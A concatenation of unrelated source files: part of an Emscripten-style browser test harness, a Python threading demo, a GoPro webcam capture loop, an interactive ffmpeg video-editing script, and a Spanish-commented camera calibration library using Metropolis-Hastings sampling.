if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting, basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
# Inject support code for reporting results. This adds an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-s', 'IN_TEST_HARNESS']
if reporting != Reporting.NONE:
# For basic reporting we inject JS helper funtions to report result back to server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
# If C reporting (i.e. REPORT_RESULT macro) is required
# also compile in report_result.cpp and forice-include report_result.h
args += ['-I' + TEST_ROOT,
'-include', test_file('report_result.h'),
test_file('report_result.cpp')]
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
with a given result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args
args = args.copy()
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-s', 'GL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in original_args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING'], message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure,
make,
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = Path(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
# Useful in debugging sometimes to comment this out, and two lines above
shutil.copytree(source_dir, project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = os.environ.copy()
env.update(env_init)
if not native:
# Inject emcmake, emconfigure or emmake accordingly, but only if we are
# cross compiling.
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
else:
make = [EMMAKE] + make
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
print('-- configure stdout --')
print(read_file(Path(project_dir, 'configure_out')))
print('-- end configure stdout --')
print('-- configure stderr --')
print(read_file(Path(project_dir, 'configure_err')))
print('-- end configure stderr --')
raise
# if we run configure or cmake we don't then need any kind
# of special env when we run make below
env = None
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, read_binary(f)))
return generated_libs
|
Thread.py
|
import concurrent.futures
import time
start = time.perf_counter()
def do_something(seconds):
print(f'Sleeping {seconds} second(s)...')
time.sleep(seconds)
return f'Done Sleeping...{seconds}'
with concurrent.futures.ThreadPoolExecutor() as executor:
secs = [5, 4, 3, 2, 1]
results = executor.map(do_something, secs)
for result in results:
print(result)
threads = []
for _ in range(10):
t = threading.Thread(target=do_something, args=[1.5])
t.start()
threads.append(t)
for thread in threads:
thread.join()
finish = time.perf_counter()
print(f'Finished in {round(finish-start, 2)} second(s)')
|
hero9-take-photo-webcam.py
|
import sys
import time
from goprocam import GoProCamera, constants
import threading
def take_photo(interface):
gopro = GoProCamera.GoPro(ip_address=GoProCamera.GoPro.getWebcamIP(
interface), camera=constants.gpcontrol, webcam_device=interface)
while True:
gopro.take_photo()
time.sleep(2)
print("Photo taken")
cameras = sys.argv[1]
cameras = cameras.split(",")
for interface in cameras:
thr = threading.Thread(target=take_photo, args=(interface,))
thr.start()
|
video-processor.py
|
import ffmpeg, sys, numpy, traceback, time, os, platform, threading, subprocess
from subprocess import call
#from rich import print
#pip install ffmpeg-python
def OS_info():
global width; width = os.get_terminal_size().columns
terminal = os.environ.get('TERM')
#width_len = len(width)
cwd = os.getcwd()
# IP_INFO = f"\033[1;35;0m {IPx.IP}"
current_version = platform.release(); system_info = platform.platform(); os_name0 = platform.system(); current_platform = platform.system()
platform_name = sys.platform; big_names = platform.uname(); processor = platform.processor(); architecture = platform.architecture(); user_id = os.uname() ;login = os.getlogin()
print()
print('X' * 50)
print(f'**[SYSTEM INFO]**'.center(width))
print()
print(f'\033[1;35;m [CURRENT_PLATFORM]--[{current_platform}] ...? '.center(width))
print(f'\033[1;35;m [PLATFORM_NAME]--[{platform_name}] ...? '.center(width))
print(f'\033[1;35;m [CURRENT_VERSION]--[{current_version}] ...? '.center(width))
print(f'\033[1;35;m [OS-NAME]--[{os_name0}] + [{terminal}] ...? '.center(width))
print(f'\033[1;35;m [SYSTEM-INFO]--[{system_info}] ...? '.center(width))
print(f'\033[1;35;0m [CURRENT-VERSION]--[{current_version}] ...? '.center(width))
print(f'\033[1;35;0m [UUID]--[{big_names}] ...? '.center(width))
print(f'\033[1;35;0m [PROCESSOR]--[{processor}] ...? '.center(width))
print(f'\033[1;35;0m [ARCHITECTURE]--[{architecture}] ...? '.center(width))
print(f'\033[1;35;0m [USER-ID]--[{user_id}] ...? '.center(width))
print(f'\033[1;35;0m [LOGIN]--[{login}] ...? '.center(width))
print('X' * 50)
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
def display_header():
# print('*' * 75)
color_red = Colors()
global red0
red0 = color_red.fgRed
global reset0
reset0 = color_red.reset
x = 'x'
print(f"{'X' * 125:^70}")
print(f"{'X' * 125:^70}")
pretty = f'{red0}xxx FILE-MOVER xxx{reset0}'.center(width)
print(f'{pretty : ^70}')
print(f"{'X' * 125: ^70}")
one = (
f'{bblue}[SCRIPT] *** A/V Converter *** {bblue}')
two = (
f'[USAGE] - [1] The Program will can: 1.] re-encode AV Conntainers to whatever format needed. IE- .MP4 -> .MOV')
three = (
f'[USAGE] - [2] Trim AV, with Min/Max Values && duration ')
four = (f'[USAGE] - [3] Compresses the AV, by rescaling resolution and resizing file')
five = (
f'[USAGE] - [5] Play Videos.{reset}')
six = (f'{red}[+]-[+] copyright material from Adel Al-Aali [+]-[+] {reset}')
seven = (f'[+] Future Addtion: Attach to OS.Listwalker and impliment Generator/text feed to auto convert large lists [+]')
print(f"{one:^70}")
print(f"{two:^70}")
print(f"{three:^70}")
print(f"{four:^70}")
print(f"{five:^70}")
print(f"{six:^70}")
print(f"{seven:^70}")
print(f"{x * 20: ^70}")
print(), print()
class Colors:
reset = "\033[0m"
# Black
fgBlack = "\033[30m"
fgBrightBlack = "\033[30;1m"
bgBlack = "\033[40m"
bgBrightBlack = "\033[40;1m"
# Red
fgRed = "\033[31m"
fgBrightRed = "\033[31;1m"
bgRed = "\033[41m"
bgBrightRed = "\033[41;1m"
# Green
fgGreen = "\033[32m"
fgBrightGreen = "\033[32;1m"
bgGreen = "\033[42m"
bgBrightGreen = "\033[42;1m"
# Yellow
fgYellow = "\033[33m"
fgBrightYellow = "\033[33;1m"
bgYellow = "\033[43m"
bgBrightYellow = "\033[43;1m"
# Blue
fgBlue = "\033[34m"
fgBrightBlue = "\033[34;1m"
bgBlue = "\033[44m"
bgBrightBlue = "\033[44;1m"
# Magenta
fgMagenta = "\033[35m"
fgBrightMagenta = "\033[35;1m"
bgMagenta = "\033[45m"
bgBrightMagenta = "\033[45;1m"
# Cyan
fgCyan = "\033[36m"
fgBrightCyan = "\033[36;1m"
bgCyan = "\033[46m"
bgBrightCyan = "\033[46;1m"
# White
fgWhite = "\033[37m"
fgBrightWhite = "\033[37;1m"
bgWhite = "\033[47m"
bgBrightWhite = "\033[47;1m"
def period_wait():
period = ['.', '.', '.', '.', '.', '.', '.', '.', '.', '.']
# multi = [2,2,2,2,2,2,2,2,2,2]
period_len = len(period)
with Spinner():
for z, x in enumerate(period):
print(x)
time.sleep(.2)
if z <= period_len:
z += 1
print(f"{yellow}{x * z}{reset}")
continue
elif z == period_len:
break
def clear():
# check and make call for specific operating system
os_name = platform.system()
_ = call('clear' if os_name == 'Linux' or 'Windows' or 'Darwin' else 'cls')
###########
color = Colors()
spinner = Spinner()
yellow = color.fgYellow
red = color.fgRed
blue = color.fgBlue
bblue = color.fgBrightBlue
cyan = color.fgCyan
bg_background = color.bgBlack
reset = color.reset
def splash():
with Spinner():
display_header()
period_wait()
time.sleep(8)
clear()
### display headers ##
OS_info()
time.sleep(5)
clear()
splash()
class VideoEditor():
def __init__(self):
print(f'[+] Enter **[Desired]** File Name ex:: [sample.mp4], \n\t[+] Press Enter for default file_name [new_vid]\n')
self.file00 = input('')
if self.file00 == '':
self.file00 = 'new_vid.mp4'
self.cwd = os.getcwd()
print(f" \n {'x'*50} \n [++] CWD :: \n \t [{self.cwd}][++]\n")
self.vid_loc = input('[+] Enter Video Location')
self.streamVideo = ffmpeg.input(self.vid_loc)
def __repr__(self):
return "<Test a:%s >" % (self)
def __str__(self):
return "From str method of Test: %s" % (self)
def trimVideo(self):
try:
print('\n','X'*50)
trim_start = time.time(); CTtime = time.ctime(trim_start)
start = f'[+] -- [INIIATING TRIM SEQUENCE] [+] \n{CTtime}'
print(f'[+] Enter the The Desired Start and Duration [+] \n[+]** [START] ')
tstart = input('')
print(f'[+]** [DURATION] ')
tdur = input('')
print()
print(f'{start}')
streamVideo = self.streamVideo.trim(start=tstart, duration=tdur)
streamVideo = ffmpeg.output(streamVideo, self.file00)
ffmpeg.run(streamVideo)
trim_end = time.time(); ct_end = trim_start-trim_end
end = f'[+] \n\t Completion Seconds [{round(trim_end, 3)}] \n {ct_end}'
print(f'{end}')
encoding_text = 'ff_manip.txt'
with open(encoding_text, 'a') as f:
f.write(str('meta\n' + str(self.streamVideo))+'\n'+'\n')
f.write(str('trim data' + str(start) +'\n'+'\n'))
f.write(str('trim_start'+ str(end)+ '\n'+'\n'))
f.write(str('trim_end' + str(end)+ '\n'+'\n'))
f.write(str(streamVideo))
print(f'[+] Trim Data Saved to \n{encoding_text}')
return f'[+] Succesfully trimmed data \n \t\t[START] [{tstart}] :: [DUR] [{tdur}]'
except Exception as e:
traceback.print_exc()
return f'[-] Error in Trim Parse \n \n [{e}]\n\t\t :: [FILE_NAME]--[[{self.file00}]] :: \t\t[START] [{tstart}] :: [DUR] [{tdur}] \n{traceback.print_exc()}'
def encoder(self):
try:
print('\n', 'X'*50)
print('[+] Enter The Desired Filename / Encoding [ex: output.mp4]')
encode_out = input('')
encode_start = time.time(); ECTtime = time.ctime(encode_start)
start = f'[+] -- [INIIATING TRIM SEQUENCE] [+] \n{ECTtime}'
print(f'{start}')
streamVideo = ffmpeg.output(self.streamVideo, encode_out)
ffmpeg.run(streamVideo)
encode_end = time.time(); ect_end= encode_start - encode_end
end = f'[+] \n\t Completion Seconds [{round(encode_end, 3)}] \n {ect_end}'
print(f'{end}')
encoding_text = 'ff_manip.txt'
with open(encoding_text, 'a') as f:
f.write(str('meta\n' + str(self.streamVideo))+'\n'+'\n')
f.write(str('encoding start' + str(start))+'\n'+'\n')
f.write(str('encoding end' + str(end))+'\n'+'\n')
f.write(str('encoding data ' + str(streamVideo)+'\n')+'\n')
print(f'[+] Trim Data Saved to \n{encoding_text}')
return f'[+] [Successfully Formatted Data] \n \t\t[FILE_NAME] [{encode_out}] :: '
except Exception as e:
traceback.print_exc()
return f'[-] Error in Trim Parse \n \n [{e}] \t\t:: [FILE_NAME]--[[{self.file00}]] :: \n{ traceback.print_exc()}'
def changeFPS(self):
try:
print('\n','X'*50)
print('[+] Enter The Desired fps [must be INT]\n **')
fps = input('')
fps = int(fps)
fps_start = time.time()
fpsctime = time.ctime(fps_start)
start = f'[+] -- [INIIATING TRIM SEQUENCE] [+] \n{fpsctime}\t\t [FPS] --[{fps}]'
print(f'{start}')
streamVideo = self.streamVideo.filter('fps', fps=fps, round='up')
streamVideo = ffmpeg.output(self.streamVideo, self.file00)
ffmpeg.run(streamVideo)
encoding_text = 'ff_manip.txt'
print(f'[+] [CHANGE FPS -- SUCCESS] \n{streamVideo}')
fps_end = time.time(); fect_end=fps_start-fps_end
end = f'[+] \n\t Completion Seconds [{round(fps_end, 3)}] \n {fps_end}'
print(f'{end}')
with open(encoding_text, 'a') as f:
f.write(str('meta' + str(self.streamVideo))+'\n')
f.write(str('encoding start' + str(start))+'\n')
f.write(str('encoding end' + str(fps_end))+'\n')
f.write(str('encoding meta' + str(streamVideo))+'\n')
return f'[+] [Successfully CHANGED DATA FPS ] \n \t\t:: [FILE_NAME]--[[{self.file00}]] :: '
except Exception as e:
traceback.print_exc()
return f'[-] Error in Trim Parse \n \n [{e}] \t\t :: [FILE_NAME]--[[{self.file00}]] :: \n{traceback.print_exc()}'
def scaleVideo(self):
try:
print('\n', 'X' * 50)
scalestart = time.time()
cscalestart = time.ctime(scalestart)
start = f'[+] -- [INIIATING VIDEO-SCALER] -- [+] \n{cscalestart}'
print(f'[+] Enter the The Desired Scale Resolution *[MUST BE INT]* [+] \n\t\t [+]**[HORZONTAL]')
horz = input('')
print('\n\t\t[+]**[VERTICAL]')
vert = input('')
scale = f'{horz}x{vert}'
print(f'[+] Entered :: [{str(scale)}]')
print(f'{start}')
streamVideo = self.streamVideo.filter('scale', w=horz, h=vert)
streamVideo = ffmpeg.output(self.streamVideo, str(self.file00))
ffmpeg.run(streamVideo)
print(f'[+] [CHANGE FPS -- SUCCESS] \n{streamVideo}')
scale_end = time.time();
scalEnd = scalestart - scale_end
scaleEndC= time.ctime(scalEnd)
end = f'[+] \n\t Completion Seconds [{round(scalEnd, 3)}] \n {scaleEndC}'
print(f'{end}')
encoding_text = 'ff_manip.txt'
with open(encoding_text, 'a') as f:
f.write(str('meta' + str(self.streamVideo)))
f.write(str('Scale Start' + start))
f.write(str('Resolution' + scale))
f.write(str('Scale End' + str(scalEnd)))
f.write(str('Scale meta' + str(streamVideo)))
return f'[+] [Successfully Scaled Video ] \n \t\t:: [FILE_NAME]--[[{self.file00}]] :: \n\t\t [{scale}] '
except Exception as e:
traceback.print_exc()
return f'[-] Error in [SCALING VIDEO]\n \n [{e}] \t\t:: [FILE_NAME]--[[{self.file00}]] :: \n{traceback.print_exc()}'
v_Editor = VideoEditor()
affirmative = ["Yes","yes","YES","y","Y","ye","YE",""]
negative = ["No","no","NO","n","N","neg"]
print('[+] A/V Converter.')
try:
print(f"\n {'X'*50}") ## ENCODER
print('[+] Change Encoding?')
encodeA = input('')
if encodeA in affirmative:
flag01 = v_Editor.encoder()
print(f'[++] -- {flag01} -- [++]')
elif encodeA in negative:
print('[-] Passing -- [ENCODE VIDEO]')
pass
print(f"\n {'X'*50}") ## TRIMMER
print('[+] Trim Video?.')
trimA = input('')
if trimA in affirmative:
print('[+] Starting -- [TRIM VIDEO] -- [+]')
flag = v_Editor.trimVideo()
print(f'[++] -- {flag} -- [++]')
print(f"{'X' * 50}\n")
elif trimA in negative:
print('[-] Passing -- [TRIM VIDEO]')
pass
print('[+] Change FPS?') ## FPS
fpsA = input('')
if fpsA in affirmative:
print('[+] Starting --[CHANGE FPS] -- [+].')
flag = v_Editor.changeFPS()
print(f'--[{flag}]--')
elif fpsA in negative:
print('[-] Passing -- [CHANGE FPS]')
pass
## VIDEO SCALER
print(f"\n {'X' * 50}") ## TRIMMER
print('[+] Scale Video?.')
scaleA = input('')
if scaleA in affirmative:
print('[+] Starting -- [SCALE-VIDEO] -- [+]')
flag = v_Editor.scaleVideo()
print(f'[++] -- {flag} -- [++]')
print(f"{'X' * 50}\n")
elif trimA in negative:
print('[-] Passing -- [VIDEO-SCALER]')
splash()
pass
except Exception as e:
print(f'[-] Error in Trim Parse \n \n [{e}] \t\t \n{traceback.print_exc()}')
# ## reduce video fps
# streamVideo = streamVideo.filter('fps', fps=10, round='up')
# ## change video scaling
# streamVideo = streamVideo.filter('scale', w=128, h=128)
# ## output
# streamVideo = ffmpeg.output(streamVideo, 'output.mov')
# ffmpeg.run(streamVideo)
|
bayesLib.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 22 23:38:35 2017
para UNLP
calibracion con incerteza:
1- calibracion intrinseca chessboard con ocv
2- tomo como condicion inicial y optimizo una funcion error custom
3- saco el hessiano en el optimo
4- sacar asi la covarianza de los parametros optimizados
teste0:
1- con imagenes no usadas para calibrar calcula la probabilidad de los
parámetros optimos dado los datos de test
@author: sebalander
"""
# %%
#import glob
import numpy as np
from calibration import calibrator as cl
from numpy import any as anny
from scipy.stats import chi2
from scipy.linalg import inv
import numdifftools as ndf
from multiprocess import Process, Queue
modelos = ['poly', 'rational', 'fisheye', 'stereographic']
# https://github.com/uqfoundation/multiprocess/tree/master/py3.6/examples
# %% funcion error
# MAP TO HOMOGENOUS PLANE TO GET RADIUS
def int2flat(cameraMatrix, distCoeffs, model):
'''
parametros intrinsecos concatenados como un solo vector
'''
if model==modelos[3]:
# stereographic case is special
kFlat = cameraMatrix[[0,1],2]
dFlat = np.reshape(distCoeffs, -1)
else:
kFlat = cameraMatrix[[0,1,0,1],[0,1,2,2]]
dFlat = np.reshape(distCoeffs, -1)
X = np.concatenate((kFlat, dFlat))
Ns = np.array([len(kFlat), len(dFlat)])
Ns = np.cumsum(Ns)
return X, Ns
def flat2CamMatrix(kFlat, model):
cameraMatrix = np.eye(3, dtype=float)
if model==modelos[3]:
cameraMatrix[[0, 1], 2] = kFlat
else:
cameraMatrix[[0, 1, 0, 1], [0, 1, 2, 2]] = kFlat
return cameraMatrix
def flat2int(X, Ns, model):
'''
hace lo inverso de int2flat
'''
kFlat = X[0:Ns[0]]
dFlat = X[Ns[0]:Ns[1]]
cameraMatrix = flat2CamMatrix(kFlat, model)
distCoeffs = dFlat
return cameraMatrix, distCoeffs
def ext2flat(rVec, tVec):
'''
toma un par rvec, tvec y devuelve uno solo concatenado
'''
rFlat = np.reshape(rVec, -1)
tFlat = np.reshape(tVec, -1)
X = np.concatenate((rFlat, tFlat))
return X
def flat2ext(X):
'''
hace lo inverso de ext2flat
'''
rFlat = X[0:3]
tFlat = X[3:]
rVecs = np.reshape(rFlat, 3)
tVecs = np.reshape(tFlat, 3)
return rVecs, tVecs
# %%
def errorCuadraticoImagen(Xext, Xint, Ns, params, j, mahDist=False):
'''
el error asociado a una sola imagen, es para un par rvec, tvec
necesita tambien los paramatros intrinsecos
if mahDist=True it returns the squared mahalanobis distance for the
proyection points
'''
# saco los parametros de flat para que los use la func de projection
cameraMatrix, distCoeffs = flat2int(Xint, Ns, params['model'])
rvec, tvec = flat2ext(Xext)
# saco los parametros auxiliares
imagePoints = params["imagePoints"]
model = params["model"]
chessboardModel = params["chessboardModel"]
Cccd = params["Cccd"]
Cf = params["Cf"]
Ck = params["Ck"]
Crt = params["Crt"]
Cfk = params["Cfk"]
try: # check if there is covariance for this image
Cov = Cccd[j]
except:
Cov = None
# hago la proyeccion
xi, yi = imagePoints[j].T
xm, ym, Cm = cl.inverse(xi, yi, rvec, tvec, cameraMatrix,
distCoeffs, model, Cov, Cf, Ck, Crt[j], Cfk)
# error
er = ([xm, ym] - chessboardModel[:,:2].T).T
Cmbool = anny(Cm)
if Cmbool:
# devuelvo error cuadratico pesado por las covarianzas
S = np.linalg.inv(Cm) # inverse of covariance matrix
# distancia mahalanobis
Er = np.sum(er.reshape((-1, 2, 1))
* S
* er.reshape((-1, 1, 2)),
axis=(1, 2))
if not mahDist:
# add covariance normalisation error
Er += np.linalg.det(Cm)
else:
# error cuadratico sin pesos ni nada
Er = np.sum(er**2, axis=1)
return Er
def etotalExt(Xext, Xint, Ns, params, j):
'''
calcula el error total como la suma de los errore de cada punto en cada
imagen
'''
return errorCuadraticoImagen(Xext, Xint, Ns, params, j, mahDist=False).sum()
def errorCuadraticoInt(Xint, Ns, XextList, params, mahDist=False):
'''
el error asociado a todas la imagenes, es para optimizar respecto a los
parametros intrinsecos
'''
# error
Er = list()
for j in range(len(XextList)):
# print(j)
Er.append(errorCuadraticoImagen(XextList[j], Xint,Ns, params,
j, mahDist=mahDist))
return np.concatenate(Er)
def etotalInt(Xint, Ns, XextList, params):
'''
calcula el error total como la suma de los errore de cada punto en cada
imagen
'''
return errorCuadraticoInt(Xint, Ns, XextList, params).sum()
# %% metropolis hastings
from numpy.random import rand as rn
class metHas:
def __init__(self, Ns, XextList, params, sampleador):
self.Ns = Ns
self.XextList = XextList
self.params = params
self.generados = 0
self.gradPos = 0
self.gradNeg = 0
self.mismo = 0
self.sampleador = sampleador
def nuevo(self, old, oldE):
# genero nuevo
new = self.sampleador.rvs() # rn(8) * intervalo + cotas[:,0]
self.generados += 1
# cambio de error
newE = etotalInt(new, self.Ns, self.XextList, self.params)
deltaE = newE - oldE
if deltaE < 0:
self.gradPos += 1
print("Gradiente Positivo")
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # tiene menor error, listo
else:
# nueva opoertunidad, sampleo contra rand
pb = np.exp(- deltaE / 2)
if pb > rn():
self.gradNeg += 1
print("Gradiente Negativo, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # aceptado a la segunda oportunidad
else:
# # vuelvo recursivamente al paso2 hasta aceptar
# print('rechazado, pb=', pb)
# new, newE = nuevo(old, oldE)
self.mismo +=1
print("Mismo punto, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return old, oldE
return new, newE
class metHasExt:
'''
clase para ahcer las iteraciones de metropolis para la calibracion
extrinseca
'''
def __init__(self, Xint, Ns, params, sampleador, priorExt, W):
self.Ns = Ns
self.Xint = Xint
self.params = params
self.generados = 0
self.gradPos = 0
self.gradNeg = 0
self.mismo = 0
self.sampleador = sampleador
self.priorExt = priorExt
self.W = W
def ePrior(self, Xext):
'''
el error de prior solo va para la posicion y no para los angulos porque no
hay info facil de los angulos a priori
'''
return self.W.dot((Xext - self.priorExt)**2)
# error total
def etotalExt(self, Xext):
'''
calcula el error total como la suma de los errores de cada punto en una
imagen mas el prior
'''
ep = self.ePrior(Xext)
ep += errorCuadraticoImagen(Xext, self.Xint, self.Ns, self.params, 0).sum()
return ep
def nuevo(self, old, oldE):
# genero nuevo
new = self.sampleador.rvs() # rn(8) * intervalo + cotas[:,0]
self.generados += 1
# cambio de error
newE = self.etotalExt(new)
deltaE = newE - oldE
if deltaE < 0:
self.gradPos += 1
print("Gradiente Positivo")
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # tiene menor error, listo
else:
# nueva opoertunidad, sampleo contra rand
pb = np.exp(- deltaE / 2)
if pb > rn():
self.gradNeg += 1
print("Gradiente Negativo, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # aceptado a la segunda oportunidad
else:
# # vuelvo recursivamente al paso2 hasta aceptar
# print('rechazado, pb=', pb)
# new, newE = nuevo(old, oldE)
self.mismo +=1
print("Mismo punto, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return old, oldE
return new, newE
# %% funciones para calcular jacobiano y hessiano in y externo
Jint = ndf.Jacobian(errorCuadraticoInt) # (Ns,)
Hint = ndf.Hessian(errorCuadraticoInt) # (Ns, Ns)
Jext = ndf.Jacobian(errorCuadraticoImagen) # (6,)
Hext = ndf.Hessian(errorCuadraticoImagen) # (6,6)
# una funcion para cada hilo
def procJint(Xint, Ns, XextList, params, ret):
ret.put(Jint(Xint, Ns, XextList, params))
def procHint(Xint, Ns, XextList, params, ret):
ret.put(Hint(Xint, Ns, XextList, params))
def procJext(Xext, Xint, Ns, params, j, ret):
ret.put(Jext(Xext, Xint, Ns, params, j))
def procHext(Xext, Xint, Ns, params, j, ret):
ret.put(Hext(Xext, Xint, Ns, params, j))
# %%
def jacobianos(Xint, Ns, XextList, params, hessianos=True):
'''
funcion que calcula los jacobianos y hessianos de las variables intrinsecas
y extrinsecas. hace un hilo para cada cuenta
'''
# donde guardar resultado de derivadas de params internos
jInt = Queue()
if hessianos:
hInt = Queue()
# creo e inicializo los threads
if hessianos:
# print('cuentas intrinsecas, 2 processos')
pHInt = Process(target=procHint, args=(Xint, Ns, XextList,
params, hInt))
pHInt.start()
#else:
# print('cuentas intrinsecas, 1 processo')
pJInt = Process(target=procJint, args=(Xint, Ns, XextList, params, jInt))
pJInt.start() # inicio procesos
# donde guardar resultados de jaco y hess externos
n = len(XextList)
jExt = np.zeros((n, 1, 6), dtype=float)
qJext = [Queue() for nn in range(n)]
if hessianos:
hExt = np.zeros((n, 6, 6), dtype=float)
